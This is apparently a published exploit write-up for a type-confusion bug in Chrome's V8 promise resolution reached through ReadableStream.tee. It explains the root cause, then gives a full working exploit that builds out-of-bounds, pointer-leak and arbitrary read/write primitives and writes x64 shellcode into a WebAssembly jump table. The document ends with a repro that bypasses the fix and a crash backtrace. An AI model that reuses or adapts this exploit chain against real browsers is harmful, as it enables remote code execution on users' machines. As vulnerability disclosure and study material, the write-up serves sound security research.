1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555 | <!--
VULNERABILITY DETAILS
==1. TriggerPromiseReactions==
https://cs.chromium.org/chromium/src/v8/src/objects.cc?rcl=d24c8dd69f1c7e89553ce101272aedefdb41110d&l=5975
Handle<Object> JSPromise::TriggerPromiseReactions(Isolate* isolate,
Handle<Object> reactions,
Handle<Object> argument,
PromiseReaction::Type type) {
DCHECK(reactions->IsSmi() || reactions->IsPromiseReaction());
// We need to reverse the {reactions} here, since we record them
// on the JSPromise in the reverse order.
{
DisallowHeapAllocation no_gc;
Object current = *reactions;
Object reversed = Smi::kZero;
while (!current->IsSmi()) {
Object next = PromiseReaction::cast(current)->next(); // ***1***
PromiseReaction::cast(current)->set_next(reversed);
reversed = current;
current = next;
}
reactions = handle(reversed, isolate);
}
[...]
A Semmle query has triggered a warning that |TriggerPromiseReactions| performs a
typecast on the |reactions| argument without prior checks[1]. Upon further
inspection, it turned out that the JSPromise class reuses a single field to
store both the result object and the reaction list (chained callbacks).
Moreover, |JSPromise::Fulfill| and |JSPromise::Reject| don't ensure that the
promise is still in the "pending" state, instead they rely on the default
|resolve/reject| callbacks that are exposed to user JS code and use the
|PromiseBuiltins::kAlreadyResolvedSlot| context variable to determine whether
the promise has been resolved yet. So, it's enough to call, for example,
|JSPromise::Fulfill| twice on the same Promise object to trigger the type
confusion.
==2. Thenable objects and JSPromise::Resolve==
https://cs.chromium.org/chromium/src/v8/src/objects.cc?rcl=d24c8dd69f1c7e89553ce101272aedefdb41110d&l=5902
MaybeHandle<Object> JSPromise::Resolve(Handle<JSPromise> promise,
Handle<Object> resolution) {
[...]
// 8. Let then be Get(resolution, "then").
MaybeHandle<Object> then;
if (isolate->IsPromiseThenLookupChainIntact(
Handle<JSReceiver>::cast(resolution))) {
// We can skip the "then" lookup on {resolution} if its [[Prototype]]
// is the (initial) Promise.prototype and the Promise#then protector
// is intact, as that guards the lookup path for the "then" property
// on JSPromise instances which have the (initial) %PromisePrototype%.
then = isolate->promise_then();
} else {
then =
JSReceiver::GetProperty(isolate, Handle<JSReceiver>::cast(resolution),
isolate->factory()->then_string()); // ***2***
[...]
This is a known behavior, and yet it has already caused some problems in the
past (see https://bugs.chromium.org/p/chromium/issues/detail?id=663476#c10).
When the promise resolution is an object that has the |then| property, |Resolve|
synchronously accesses that property and might invoke a user-defined getter[2],
which means it's possible to run user JavaScript while the promise is in the
middle of the resolution process. However, just calling the |resolve| callback
inside the getter is not enough to trigger the type confusion because of the
|kAlreadyResolvedSlot| check. Instead, one should look for places where
|JSPromise::Resolve| is called directly.
==3. V8 extras and ReadableStream==
https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/streams/ReadableStream.js?rcl=d67a775151929f516380749eae3b32f514eade11&l=425
function ReadableStreamTee(stream) {
const reader = AcquireReadableStreamDefaultReader(stream);
let closedOrErrored = false;
let canceled1 = false;
let canceled2 = false;
let reason1;
let reason2;
const cancelPromise = v8.createPromise();
function pullAlgorithm() {
return thenPromise(
ReadableStreamDefaultReaderRead(reader), ({value, done}) => {
if (done && !closedOrErrored) {
if (!canceled1) {
ReadableStreamDefaultControllerClose(branch1controller); // ***3***
}
if (!canceled2) {
ReadableStreamDefaultControllerClose(branch2controller);
}
closedOrErrored = true;
}
[...]
function cancel1Algorithm(reason) {
canceled1 = true; // ***4***
reason1 = reason;
if (canceled2) {
const cancelResult = ReadableStreamCancel(stream, [reason1, reason2]);
resolvePromise(cancelPromise, cancelResult);
}
return cancelPromise;
}
[...]
function ReadableStreamCancel(stream, reason) {
stream[_readableStreamBits] |= DISTURBED;
const state = ReadableStreamGetState(stream);
if (state === STATE_CLOSED) {
return Promise_resolve(undefined);
}
if (state === STATE_ERRORED) {
return Promise_reject(stream[_storedError]);
}
ReadableStreamClose(stream);
const sourceCancelPromise =
ReadableStreamDefaultControllerCancel(stream[_controller], reason);
return thenPromise(sourceCancelPromise, () => undefined);
}
function ReadableStreamClose(stream) {
ReadableStreamSetState(stream, STATE_CLOSED);
const reader = stream[_reader];
if (reader === undefined) {
return;
}
if (IsReadableStreamDefaultReader(reader) === true) {
reader[_readRequests].forEach(
request =>
resolvePromise(
request.promise,
ReadableStreamCreateReadResult(undefined, true,
request.forAuthorCode)));
reader[_readRequests] = new binding.SimpleQueue();
}
resolvePromise(reader[_closedPromise], undefined);
}
A tiny part of Blink (namely, Streams API) is implemented as a v8 extra, i.e., a
set of JavaScript classes with a couple of internal v8 methods exposed to them.
The relevant ones are |v8.resolvePromise| and |v8.rejectPromise|, as they just
call |JSPromise::Resolve/Reject| and don't check the status of the promise
passed as an argument. Instead, the JS code around them defines a bunch of
boolean variables to track the stream's state. Unfortunately, there's a scenario
in which the state checks could be bypassed:
1. Create a new ReadableStream with an underlying source object that exposes the
stream controller's |stop| method.
2. Call the |tee| method to create a pair of child streams.
3. Make a read request for one of the child streams thus putting a new Promise
object to the |_readRequests| queue.
4. Define a getter for the |then| property on Object.prototype. From this point
every promise resolution where the resolution object inherits from
Object.prototype will call the getter.
5. Call |cancel| on the child stream. The call stack will eventually look like:
ReadableStreamCancel -> ReadableStreamClose -> resolvePromise ->
JSPromise::Resolve -> the |then| getter.
6. Inside the getter, calling regular methods on the child stream won't work
because its state is already set to "closed", but an attacker can call the
controller's |stop| method. Because |ReadableStreamClose| is executed before the
cancel callback[4], the |cancel1| flag won't be set yet, so the |close| method
will be called again[3] resolving the promise that is currently in the middle
of the resolution process.
The only problem here is the code [3] gets executed as another promise's
reaction, i.e. as a microtask, and microtasks are supposed to be executed
asynchronously.
==4. MicrotasksScope==
V8 exposes the MicrotasksScope class to Blink to control microtask execution.
MicrotasksScope's destructor will run all scheduled microtasks synchronously, if
the object that's being destructed is the top-level MicrotasksScope. Therefore,
calling a Blink method that instantiates a MicrotasksScope should allow running
the scheduled promise reaction[3] synchronously. However, usually all JS code
(<script> body, event handlers, timeouts) already runs inside a MicrotasksScope.
One way to overcome this is to define the JS code as the |handleEvent| property
getter of an EventListener object and add the listener to, e.g., the |load|
event.
Putting it all together, the PoC is as follows:
<body>
<script>
performMicrotaskCheckpoint = () => {
document.createNodeIterator(document, -1, {
acceptNode() {
return NodeFilter.FILTER_ACCEPT;
} }).nextNode();
}
runOutsideMicrotasksScope = func => {
window.addEventListener("load", { get handleEvent() {
func();
} });
}
runOutsideMicrotasksScope (() => {
let stream = new ReadableStream({ start(ctr) { controller = ctr } });
let tee_streams = stream.tee();
let reader = tee_streams[0].getReader();
reader.read();
let then_counter = 0;
Object.prototype.__defineGetter__("then", function() {
if (++then_counter == 1) {
controller.close();
performMicrotaskCheckpoint();
}
});
reader.cancel();
});
</script>
</body>
==5. Exploitation==
The bug allows an attacker to make the browser treat the object of their choice
as a PromiseReaction. If the second qword of the object contains a value that
looks like a tagged pointer, |TriggerPromiseReactions| will treat it as a
pointer to another PromiseReaction in the reaction chain and try to reverse the
chain. This primitive is not very useful without a separate info leak bug. If
the second qword looks like a Smi, the method will overwrite the first, third
and fourth qwords with tagged pointers. So, if the attacker allocates a
HeapNumber and a FixedDobuleArray that are adjacent to each other, and the
umber's value has its LSB set to 0, the function will overwrite the array's
length with a pointer that looks like a sufficiently large Smi. The array's map
pointer will also get corrupted, but that's not important (at least, for release
builds).
-----------------------------------------------------------------
| HeapNumber || FixedDoubleArray |
-----------------------------------------------------------------
| Map | Value || Map | Length | Element 0 | ... |
-----------------------------------------------------------------
Once the attacker has the relative read/write primitive, it's easy to construct
the pointer leak and arbitrary read/write primitives by finding the offsets of a
couple other objects allocated next to the array. Finally, to execute the
shellcode the exploit overwrites the jump table of a WebAssembly function, which
is stored in a RWX memory page.
Exploit (the shellcode runs gnome-calculator on linux x64):
-->
<body>
<script>
performMicrotaskCheckpoint = () => {
document.createNodeIterator(document, -1, {
acceptNode() {
return NodeFilter.FILTER_ACCEPT;
} }).nextNode();
}
runOutsideMicrotasksScope = func => {
window.addEventListener("load", { get handleEvent() {
func();
} });
}
let data_view = new DataView(new ArrayBuffer(8));
reverseDword = dword => {
data_view.setUint32(0, dword, true);
return data_view.getUint32(0, false);
}
reverseQword = qword => {
data_view.setBigUint64(0, qword, true);
return data_view.getBigUint64(0, false);
}
floatAsQword = float => {
data_view.setFloat64(0, float);
return data_view.getBigUint64(0);
}
qwordAsFloat = qword => {
data_view.setBigUint64(0, qword);
return data_view.getFloat64(0);
}
let oob_access_array;
let ptr_leak_object;
let arbirary_access_array;
let ptr_leak_index;
let external_ptr_index;
const MARKER = 0x31337;
leakPtr = obj => {
ptr_leak_object[0] = obj;
return floatAsQword(oob_access_array[ptr_leak_index]);
}
getQword = address => {
oob_access_array[external_ptr_index] = qwordAsFloat(address);
return arbirary_access_array[0];
}
setQword = (address, value) => {
oob_access_array[external_ptr_index] = qwordAsFloat(address);
arbirary_access_array[0] = value;
}
getField = (object_ptr, num, tagged = true) =>
object_ptr + BigInt(num * 8 - (tagged ? 1 : 0));
setBytes = (address, array) => {
for (let i = 0; i < array.length; ++i) {
setQword(address + BigInt(i), BigInt(array[i]));
}
}
// ------------------------- \\
runOutsideMicrotasksScope (() => {
oob_access_array = Array(16).fill(1.1);
ptr_leak_object = {};
arbirary_access_array = new BigUint64Array(1);
oob_access_array.length = 0;
const heap_number_to_corrupt = qwordAsFloat(0x10101010n);
oob_access_array[0] = 1.1;
ptr_leak_object[0] = MARKER;
arbirary_access_array.buffer;
let stream = new ReadableStream({ start(ctr) { controller = ctr } });
let tee_streams = stream.tee();
let reader = tee_streams[0].getReader();
reader.read();
reader.read();
let then_counter = 0;
Object.prototype.__defineGetter__("then", function() {
let counter_value = ++then_counter;
if (counter_value == 1) {
controller.close();
performMicrotaskCheckpoint();
throw 0x123;
} else if (counter_value == 2) {
throw heap_number_to_corrupt;
} else if (counter_value == 4) {
oob_access_array.length = 60;
findOffsets();
runCalc();
}
});
reader.cancel();
});
findOffsets = () => {
let markerAsFloat = qwordAsFloat(BigInt(MARKER) << 32n);
for (ptr_leak_index = 0; ptr_leak_index < oob_access_array.length;
++ptr_leak_index) {
if (oob_access_array[ptr_leak_index] === markerAsFloat) {
break;
}
}
let oneAsFloat = qwordAsFloat(1n << 32n);
for (external_ptr_index = 2; external_ptr_index < oob_access_array.length;
++external_ptr_index) {
if (oob_access_array[external_ptr_index - 2] === oneAsFloat &&
oob_access_array[external_ptr_index - 1] === 0) {
break;
}
}
if (ptr_leak_index === oob_access_array.length ||
external_ptr_index === oob_access_array.length) {
throw "Couldn't find the offsets";
}
}
runCalc = () => {
const wasm_code = new Uint8Array([
0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
0x01, 0x85, 0x80, 0x80, 0x80, 0x00, 0x01, 0x60,
0x00, 0x01, 0x7f, 0x03, 0x82, 0x80, 0x80, 0x80,
0x00, 0x01, 0x00, 0x06, 0x81, 0x80, 0x80, 0x80,
0x00, 0x00, 0x07, 0x85, 0x80, 0x80, 0x80, 0x00,
0x01, 0x01, 0x61, 0x00, 0x00, 0x0a, 0x8a, 0x80,
0x80, 0x80, 0x00, 0x01, 0x84, 0x80, 0x80, 0x80,
0x00, 0x00, 0x41, 0x00, 0x0b
]);
const wasm_instance = new WebAssembly.Instance(
new WebAssembly.Module(wasm_code));
const wasm_func = wasm_instance.exports.a;
const shellcode = [
0x48, 0x31, 0xf6, 0x56, 0x48, 0x8d, 0x3d, 0x32,
0x00, 0x00, 0x00, 0x57, 0x48, 0x89, 0xe2, 0x56,
0x48, 0x8d, 0x3d, 0x0c, 0x00, 0x00, 0x00, 0x57,
0x48, 0x89, 0xe6, 0xb8, 0x3b, 0x00, 0x00, 0x00,
0x0f, 0x05, 0xcc, 0x2f, 0x75, 0x73, 0x72, 0x2f,
0x62, 0x69, 0x6e, 0x2f, 0x67, 0x6e, 0x6f, 0x6d,
0x65, 0x2d, 0x63, 0x61, 0x6c, 0x63, 0x75, 0x6c,
0x61, 0x74, 0x6f, 0x72, 0x00, 0x44, 0x49, 0x53,
0x50, 0x4c, 0x41, 0x59, 0x3d, 0x3a, 0x30, 0x00
];
wasm_instance_ptr = leakPtr(wasm_instance);
const jump_table = getQword(getField(wasm_instance_ptr, 32));
setBytes(jump_table, shellcode);
wasm_func();
}
</script>
</body>
<!--
VERSION
Google Chrome 72.0.3626.96 (Official Build) (64-bit)
Google Chrome 74.0.3702.0 (Official Build) dev (64-bit)
The Chrome team has landed a fix for the issue, but there's a way to bypass it.
From Chromium's bug tracker:
Sadly, there's still a way to bypass the latest fix. The fix prevents multiple resolution when all
the calls come from the |v8.resolvePromise| or |v8.rejectPromise| method exposed to v8 extras.
However, |ReadableStreamReaderGenericRelease| might use the regular |Promise.reject| method to
create an initially rejected promise and store it in |reader[_closedPromise]|:
https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/streams/ReadableStream.js?rcl=bf33c15cd092ea27c870a5a115d138700737cb5e&l=722
function ReadableStreamReaderGenericRelease(reader) {
// TODO(yhirano): Remove this when we don't need hasPendingActivity in
// blink::UnderlyingSourceBase.
const controller = reader[_ownerReadableStream][_controller];
if (controller[_readableStreamDefaultControllerBits] &
BLINK_LOCK_NOTIFICATIONS) {
// The stream is created with an external controller (i.e. made in
// Blink).
const lockNotifyTarget = controller[_lockNotifyTarget];
callFunction(lockNotifyTarget.notifyLockReleased, lockNotifyTarget);
}
if (ReadableStreamGetState(reader[_ownerReadableStream]) ===
STATE_READABLE) {
rejectPromise(
reader[_closedPromise],
new TypeError(errReleasedReaderClosedPromise));
} else {
reader[_closedPromise] =
Promise_reject(new TypeError(errReleasedReaderClosedPromise)); // ********
}
Then, |ReadableStreamClose| might try to resolve it:
https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/streams/ReadableStream.js?rcl=bf33c15cd092ea27c870a5a115d138700737cb5e&l=541
function ReadableStreamClose(stream) {
ReadableStreamSetState(stream, STATE_CLOSED);
const reader = stream[_reader];
if (reader === undefined) {
return;
}
if (IsReadableStreamDefaultReader(reader) === true) {
reader[_readRequests].forEach(
request =>
resolvePromise(
request.promise,
ReadableStreamCreateReadResult(undefined, true,
request.forAuthorCode)));
reader[_readRequests] = new binding.SimpleQueue();
}
resolvePromise(reader[_closedPromise], undefined); // ********
}
It's not possible to call |ReadableStreamReaderGenericRelease| until the
|reader[_readRequests]| queue is empty, so an attacker has to call the |close| method twice as in
the original repro case. The call succeeds because |resolvePromise| acts a silent no-op.
Since the promise is already rejected when it's passed to |v8.resolvePromise|, the code hits the
assertion added to |PromiseInternalResolve| in the previous patch. It turns out that there's a
JSCallReducer optimization for |v8.resolvePromise| that doesn't generate the same assertion,
so the attacker can trigger optimization of |ReadableStreamCancel| to bypass the check:
https://cs.chromium.org/chromium/src/v8/src/compiler/js-call-reducer.cc?rcl=fee9be7abb565fc2f2ae7c20e7597bece4fc7144&l=5727
Reduction JSCallReducer::ReducePromiseInternalResolve(Node* node) {
DCHECK_EQ(IrOpcode::kJSCall, node->opcode());
Node* promise = node->op()->ValueInputCount() >= 2
? NodeProperties::GetValueInput(node, 2)
: jsgraph()->UndefinedConstant();
Node* resolution = node->op()->ValueInputCount() >= 3
? NodeProperties::GetValueInput(node, 3)
: jsgraph()->UndefinedConstant();
Node* frame_state = NodeProperties::GetFrameStateInput(node);
Node* context = NodeProperties::GetContextInput(node);
Node* effect = NodeProperties::GetEffectInput(node);
Node* control = NodeProperties::GetControlInput(node);
// Resolve the {promise} using the given {resolution}.
Node* value = effect =
graph()->NewNode(javascript()->ResolvePromise(), promise, resolution,
context, frame_state, effect, control);
ReplaceWithValue(node, value, effect, control);
return Replace(value);
}
Repro:
<body>
<script>
performMicrotaskCheckpoint = () => {
document.createNodeIterator(document, -1, {
acceptNode() {
return NodeFilter.FILTER_ACCEPT;
} }).nextNode();
}
runOutsideMicrotasksScope = func => {
window.addEventListener("load", { get handleEvent() {
func();
} });
}
for (let i = 0; i < 100000; ++i) {
let stream = new ReadableStream();
let reader = stream.getReader();
reader.cancel();
}
runOutsideMicrotasksScope (() => {
let stream = new ReadableStream({ start(ctr) { controller = ctr } });
let tee_streams = stream.tee();
let reader = tee_streams[0].getReader();
reader.read();
let then_counter = 0;
Object.prototype.__defineGetter__("then", function() {
if (++then_counter == 1) {
controller.close();
performMicrotaskCheckpoint();
reader.releaseLock();
}
});
reader.cancel();
});
</script>
</body>
(lldb) bt
* thread #1, name = 'chrome', stop reason = signal SIGSEGV: address access protected (fault address: 0x30fd824804e8)
* frame #0: 0x0000555cf8057317 chrome`Builtins_RejectPromise + 55
frame #1: 0x0000555cf801f7cc chrome`Builtins_RunMicrotasks + 556
frame #2: 0x0000555cf7fff598 chrome`Builtins_JSRunMicrotasksEntry + 120
frame #3: 0x0000555cf7b3e405 chrome`v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, v8::internal::(anonymous namespace)::InvokeParams const&) + 549
frame #4: 0x0000555cf7b3e895 chrome`v8::internal::(anonymous namespace)::InvokeWithTryCatch(v8::internal::Isolate*, v8::internal::(anonymous namespace)::InvokeParams const&) + 101
frame #5: 0x0000555cf7b3e9fa chrome`v8::internal::Execution::TryRunMicrotasks(v8::internal::Isolate*, v8::internal::MicrotaskQueue*, v8::internal::MaybeHandle<v8::internal::Object>*) + 74
frame #6: 0x0000555cf7c8042b chrome`v8::internal::MicrotaskQueue::RunMicrotasks(v8::internal::Isolate*) + 427
frame #7: 0x0000555cfb5c13ba chrome`blink::Microtask::PerformCheckpoint(v8::Isolate*) + 58
frame #8: 0x0000555cfc5cc301 chrome`blink::(anonymous namespace)::EndOfTaskRunner::DidProcessTask(base::PendingTask const&) + 17
-->
|
